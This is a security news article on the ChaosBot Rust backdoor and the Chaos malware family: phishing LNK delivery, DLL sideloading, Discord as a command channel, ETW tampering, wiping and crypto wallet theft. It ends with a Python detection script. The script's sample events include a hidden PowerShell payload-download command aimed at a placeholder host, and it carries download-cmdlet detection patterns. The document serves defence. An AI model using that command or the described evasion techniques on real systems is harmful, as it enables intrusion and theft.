New Rust backdoor ChaosBot: Discord as a C2 channel, destructive ransomware functions, and cryptocurrency theft

13.10.2025 2 minutes Author: Newsman

Researchers have discovered a new Rust-based backdoor called ChaosBot, which uses Discord accounts and channels for command-and-control (C2) operations. It spreads through phishing emails carrying LNK attachments and runs via DLL sideloading through legitimate binaries. At the same time, a parallel malware family known as *Chaos* — written in C++ — is evolving, adding destructive capabilities such as large-scale file deletion and clipboard address hijacking for cryptocurrency theft.

How ChaosBot operates: attackers gain initial access through phishing emails, and the implant then connects to Discord channels that relay operator commands. The malware executes shell commands through PowerShell, takes screenshots, and supports file download and upload (data exfiltration).

  • Infection stages: distributed through phishing emails with disguised Windows shortcuts (LNK), which launch a PowerShell script that downloads the payload. The payload is a sideloaded DLL (msedge.dll) loaded by a legitimate binary, so that it runs under the cover of Microsoft Edge and bypasses protection. Once installed, the infection sets up a fast reverse proxy (FRP) for remote tunneling and persistent access.

  • Evasion: disables Event Tracing for Windows (ETW) by patching NtDll!EtwEventWrite so that its activity is not logged, and checks MAC addresses to detect virtual machines, exiting immediately if a VM is found.

  • Chaos-C++ ransomware / destructive features: the Chaos-C++ variant adds a full wipe mode (deleting files by path) and clipboard hijacking that replaces cryptocurrency wallet addresses in the clipboard buffer, redirecting transactions to the attackers. It disguises itself as a system utility (such as *System Optimizer*) and stores payloads in obfuscated directories such as %APPDATA%\%READ_IT% to persist after reboot.

  • Tools and exploitation techniques: attackers attempted to use VS Code Tunnel and other remote-access methods to maintain stable, persistent access. These elements make the campaign harder to detect and trace.

ChaosBot was detected in the fall of 2025 targeting financial organizations that used compromised VPNs linked to Active Directory (AD).

The *Chaos* malware family demonstrates a growing shift toward hybrid threats, combining ransomware with cryptojacking and “living off the land” methods, such as sideloading legitimate binaries and abusing Discord for control channels.

  1. IT teams: monitor suspicious Discord and VS Code tunnel network traffic, block unauthorized FRP tunnels, and limit service account privileges (especially in AD).

  2. MFA & keys: enforce multi-factor authentication for VPN/AD and avoid using service accounts with elevated privileges.

  3. EDR/ETW monitoring: update EDR detection rules to identify ETW tampering and clipboard data manipulation linked to sideloaded DLLs.

  4. Backup & recovery: maintain offline immutable backups, and regularly test recovery workflows to minimize destructive impact.
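As an added illustration of what detection rules for this campaign can look like (example code, not from the article or the researchers' report), the following Python pass applies the four behaviours described above to constructed Sysmon-style events. Field names follow Sysmon conventions; the paths, hostnames, process names and rule names are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (EventID 1 = process create, 7 = image load,
# 3 = network connection). Paths and hostnames are illustrative only.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr https://example.invalid/p -OutFile $env:APPDATA\p.dat"'},
    {"EventID": "7", "Image": r"C:\Users\u\AppData\Roaming\Update\msedge.exe",
     "ImageLoaded": r"C:\Users\u\AppData\Roaming\Update\msedge.dll"},
    {"EventID": "3", "Image": r"C:\Users\u\AppData\Roaming\Update\msedge.exe",
     "DestinationHostname": "gateway.discord.gg"},
    {"EventID": "3", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "discord.com"},  # legitimate browser use, must not alert
    {"EventID": "1", "ParentImage": r"C:\Users\u\AppData\Roaming\Update\msedge.exe",
     "Image": r"C:\Users\u\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r'"Code.exe" tunnel'},
]

DOWNLOAD_CMDLETS = re.compile(r"iwr|invoke-webrequest|downloadstring|downloadfile|start-bitstransfer", re.I)
EDGE_DIRS = (r"c:\program files (x86)\microsoft\edge", r"c:\program files\microsoft\edge")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe", "discord.exe")
DISCORD_DOMAINS = ("discord.com", "discord.gg", "discordapp.com")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def in_program_files(path: str) -> bool:
    return path.lower().startswith("c:\\program files")

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule_name, detail) for every event matching one of the four behaviours."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        eid, image, cmd = ev.get("EventID"), ev.get("Image", ""), ev.get("CommandLine", "")
        loaded, host = ev.get("ImageLoaded", ""), ev.get("DestinationHostname", "").lower()
        # 1. LNK double-click: explorer spawns PowerShell that downloads a payload
        if eid == "1" and basename(image) == "powershell.exe" \
                and basename(ev.get("ParentImage", "")) == "explorer.exe" and DOWNLOAD_CMDLETS.search(cmd):
            hits.append(("lnk_powershell_downloader", cmd))
        # 2. msedge.dll loaded from anywhere other than the Edge install directories
        elif eid == "7" and basename(loaded) == "msedge.dll" and not loaded.lower().startswith(EDGE_DIRS):
            hits.append(("msedge_dll_sideload", loaded))
        # 3. Discord traffic from anything but a browser/client running from Program Files
        elif eid == "3" and host.endswith(DISCORD_DOMAINS) \
                and not (basename(image) in BROWSERS and in_program_files(image)):
            hits.append(("discord_c2_non_browser", image))
        # 4. VS Code remote tunnel started on the host
        elif eid == "1" and basename(image) == "code.exe" and re.search(r"\btunnel\b", cmd, re.I):
            hits.append(("vscode_tunnel_started", cmd))
    return hits
```

Rule 3 deliberately flags the sideloaded msedge.exe copy in the user profile while leaving Chrome in Program Files alone; tune the allow-list to the browsers and Discord clients actually deployed.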
